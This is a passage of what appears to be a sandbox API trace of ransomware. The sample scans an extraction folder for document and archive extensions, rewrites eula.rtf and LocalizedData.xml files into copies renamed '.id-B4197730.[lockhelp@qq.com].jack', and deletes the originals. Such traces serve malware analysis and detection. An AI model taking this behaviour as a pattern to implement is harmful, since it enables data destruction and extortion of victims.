(lpString=".docx") returned 5 [0197.772] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.772] lstrlenW (lpString=".pdf") returned 4 [0197.772] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.772] lstrlenW (lpString=".xls") returned 4 [0197.772] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.772] lstrlenW (lpString=".xlsx") returned 5 [0197.772] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.772] lstrlenW (lpString=".ppt") returned 4 [0197.772] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.772] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0197.772] lstrlenW (lpString=".zip") returned 4 [0197.772] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.772] lstrlenW (lpString=".rar") returned 4 [0197.773] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.773] lstrlenW (lpString=".bz2") returned 4 [0197.773] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.773] lstrlenW (lpString=".7z") returned 3 [0197.773] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.773] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0197.773] lstrlenW (lpString=".dbf") returned 4 [0197.773] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.773] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0197.773] lstrlenW (lpString=".1cd") returned 4 [0197.773] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.773] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0197.773] lstrlenW (lpString=".jpg") returned 4 [0197.773] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.773] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0197.773] lstrlenW (lpString="eula.rtf") returned 8 [0197.773] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0197.773] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=3683) returned 1 [0197.773] CloseHandle (hObject=0x3f4) returned 1 [0197.773] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf")) returned 0x80 [0197.774] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.774] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0197.774] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.774] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.774] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0197.774] GetLastError () returned 0x0 [0197.774] ReadFile (in: hFile=0x3f4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0xe63, lpOverlapped=0x0) returned 1 [0197.805] WriteFile (in: hFile=0x3d4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xe70, lpOverlapped=0x0) returned 1 [0197.806] ReadFile (in: hFile=0x3f4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.806] WriteFile (in: hFile=0x3d4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.806] SetEndOfFile (hFile=0x3d4) returned 1 [0197.806] CloseHandle (hObject=0x3d4) returned 1 [0197.807] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.807] SetEndOfFile (hFile=0x3f4) returned 1 [0197.808] CloseHandle (hObject=0x3f4) returned 1 [0197.808] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.808] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf")) returned 1 [0197.808] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0197.808] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0197.808] lstrlenW (lpString=".doc") returned 4 [0197.808] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.808] lstrlenW (lpString=".docx") returned 5 [0197.808] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.808] lstrlenW (lpString=".pdf") returned 4 [0197.808] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.808] lstrlenW (lpString=".xls") returned 4 [0197.808] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.808] lstrlenW (lpString=".xlsx") returned 5 [0197.808] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.809] lstrlenW (lpString=".ppt") returned 4 [0197.809] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.809] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0197.809] lstrlenW (lpString=".zip") returned 4 [0197.809] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.809] lstrlenW (lpString=".rar") returned 4 [0197.809] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.809] lstrlenW (lpString=".bz2") returned 4 [0197.809] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.809] lstrlenW (lpString=".7z") returned 3 [0197.809] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.809] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0197.809] lstrlenW (lpString=".dbf") returned 4 [0197.809] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.809] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0197.809] lstrlenW (lpString=".1cd") returned 4 [0197.809] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.809] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0197.843] lstrlenW (lpString=".jpg") returned 4 [0197.843] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.843] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0197.843] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0197.843] lstrlenW (lpString=".doc") returned 4 [0197.843] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.843] lstrlenW (lpString=".docx") returned 5 [0197.843] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.843] lstrlenW (lpString=".pdf") returned 4 [0197.843] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.843] lstrlenW (lpString=".xls") returned 4 [0197.843] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.843] lstrlenW (lpString=".xlsx") returned 5 [0197.843] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.843] lstrlenW (lpString=".ppt") returned 4 [0197.843] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.844] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0197.844] lstrlenW (lpString=".zip") returned 4 [0197.844] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.844] lstrlenW (lpString=".rar") returned 4 [0197.844] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.844] lstrlenW (lpString=".bz2") returned 4 [0197.844] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.844] lstrlenW (lpString=".7z") returned 3 [0197.844] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.844] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0197.844] lstrlenW (lpString=".dbf") returned 4 [0197.844] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.844] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0197.844] lstrlenW (lpString=".1cd") returned 4 [0197.844] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.844] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0197.844] lstrlenW (lpString=".jpg") returned 4 [0197.844] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.844] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0197.844] lstrlenW (lpString="eula.rtf") returned 8 [0197.844] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0197.859] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=54456) returned 1 [0197.859] CloseHandle (hObject=0x420) returned 1 [0197.859] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf")) returned 0x80 [0197.860] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.860] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0197.860] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.860] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.860] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0197.860] GetLastError () returned 0x0 [0197.861] ReadFile (in: hFile=0x420, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0xd4b8, lpOverlapped=0x0) returned 1 [0197.933] WriteFile (in: hFile=0x3d4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xd4c0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xd4c0, lpOverlapped=0x0) returned 1 [0197.935] ReadFile (in: hFile=0x420, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.935] WriteFile (in: hFile=0x3d4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.935] SetEndOfFile (hFile=0x3d4) returned 1 [0197.935] CloseHandle (hObject=0x3d4) returned 1 [0197.937] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.937] SetEndOfFile (hFile=0x420) returned 1 [0197.938] CloseHandle (hObject=0x420) returned 1 [0197.939] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.939] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf")) returned 1 [0197.939] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0197.939] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0197.939] lstrlenW (lpString=".doc") returned 4 [0197.939] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.939] lstrlenW (lpString=".docx") returned 5 [0197.939] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.939] lstrlenW (lpString=".pdf") returned 4 [0197.939] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.939] lstrlenW (lpString=".xls") returned 4 [0197.939] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.940] lstrlenW (lpString=".xlsx") returned 5 [0197.940] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.940] lstrlenW (lpString=".ppt") returned 4 [0197.940] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.940] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0197.940] lstrlenW (lpString=".zip") returned 4 [0197.940] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.940] lstrlenW (lpString=".rar") returned 4 [0197.940] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.940] lstrlenW (lpString=".bz2") returned 4 [0197.940] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.940] lstrlenW (lpString=".7z") returned 3 [0197.940] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.940] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0197.940] lstrlenW (lpString=".dbf") returned 4 [0197.940] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.940] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0197.940] lstrlenW (lpString=".1cd") returned 4 [0197.940] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.940] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0197.940] lstrlenW (lpString=".jpg") returned 4 [0197.940] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.940] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0197.940] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0197.940] lstrlenW (lpString=".doc") returned 4 [0197.940] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.940] lstrlenW (lpString=".docx") returned 5 [0197.940] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.941] lstrlenW (lpString=".pdf") returned 4 [0197.941] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.941] lstrlenW (lpString=".xls") returned 4 [0197.941] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.941] lstrlenW (lpString=".xlsx") returned 5 [0197.941] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.941] lstrlenW (lpString=".ppt") returned 4 [0197.941] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.941] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0197.941] lstrlenW (lpString=".zip") returned 4 [0197.941] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.941] lstrlenW (lpString=".rar") returned 4 [0197.941] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.941] lstrlenW (lpString=".bz2") returned 4 [0197.941] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.941] lstrlenW (lpString=".7z") returned 3 [0197.941] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.941] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0197.941] lstrlenW (lpString=".dbf") returned 4 [0197.941] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.941] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0197.941] lstrlenW (lpString=".1cd") returned 4 [0197.941] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.941] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0197.941] lstrlenW (lpString=".jpg") returned 4 [0197.941] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.942] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0197.942] lstrlenW (lpString="LocalizedData.xml") returned 17 [0197.942] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0197.942] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=76818) returned 1 [0197.942] CloseHandle (hObject=0x420) returned 1 [0197.942] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml")) returned 0x80 [0197.942] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.942] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0197.942] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.942] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.943] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0197.943] GetLastError () returned 0x0 [0197.943] ReadFile (in: hFile=0x420, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x12c12, lpOverlapped=0x0) returned 1 [0197.957] WriteFile (in: hFile=0x3d4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x12c20, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x12c20, lpOverlapped=0x0) returned 1 [0197.959] ReadFile (in: hFile=0x420, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.959] WriteFile (in: hFile=0x3d4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xf6, lpOverlapped=0x0) returned 1 [0197.959] SetEndOfFile (hFile=0x3d4) returned 1 [0197.959] CloseHandle (hObject=0x3d4) returned 1 [0197.962] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.962] SetEndOfFile (hFile=0x420) returned 1 [0197.963] CloseHandle (hObject=0x420) returned 1 [0197.963] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.964] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml")) returned 1 [0197.964] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0197.964] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0197.964] lstrlenW (lpString=".doc") returned 4 [0197.964] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.964] lstrlenW (lpString=".docx") returned 5 [0197.964] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.964] lstrlenW (lpString=".pdf") returned 4 [0197.964] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.964] lstrlenW (lpString=".xls") returned 4 [0197.964] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.964] lstrlenW (lpString=".xlsx") returned 5 [0197.964] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.964] lstrlenW (lpString=".ppt") returned 4 [0197.964] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.964] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0197.964] lstrlenW (lpString=".zip") returned 4 [0197.965] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.965] lstrlenW (lpString=".rar") returned 4 [0197.965] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.965] lstrlenW (lpString=".bz2") returned 4 [0197.965] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.965] lstrlenW (lpString=".7z") returned 3 [0197.965] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.965] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0197.965] lstrlenW (lpString=".dbf") returned 4 [0197.965] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.965] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0197.965] lstrlenW (lpString=".1cd") returned 4 [0197.965] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.965] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0197.965] lstrlenW (lpString=".jpg") returned 4 [0197.965] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.965] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0197.965] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0197.965] lstrlenW (lpString=".doc") returned 4 [0197.966] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.966] lstrlenW (lpString=".docx") returned 5 [0197.966] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.966] lstrlenW (lpString=".pdf") returned 4 [0197.966] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.966] lstrlenW (lpString=".xls") returned 4 [0197.966] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.966] lstrlenW (lpString=".xlsx") returned 5 [0197.966] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.966] lstrlenW (lpString=".ppt") returned 4 [0197.966] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.966] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0197.966] lstrlenW (lpString=".zip") returned 4 [0197.966] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.966] lstrlenW (lpString=".rar") returned 4 [0197.966] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.966] lstrlenW (lpString=".bz2") returned 4 [0197.966] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.966] lstrlenW (lpString=".7z") returned 3 [0197.966] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.966] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0197.966] lstrlenW (lpString=".dbf") returned 4 [0197.966] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.966] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0197.966] lstrlenW (lpString=".1cd") returned 4 [0197.966] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.966] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0197.966] lstrlenW (lpString=".jpg") returned 4 [0197.966] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.967] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0197.967] lstrlenW (lpString="LocalizedData.xml") returned 17 [0197.967] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0197.967] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=60684) returned 1 [0197.967] CloseHandle (hObject=0x420) returned 1 [0197.967] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml")) returned 0x80 [0197.967] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.967] CreateFileW 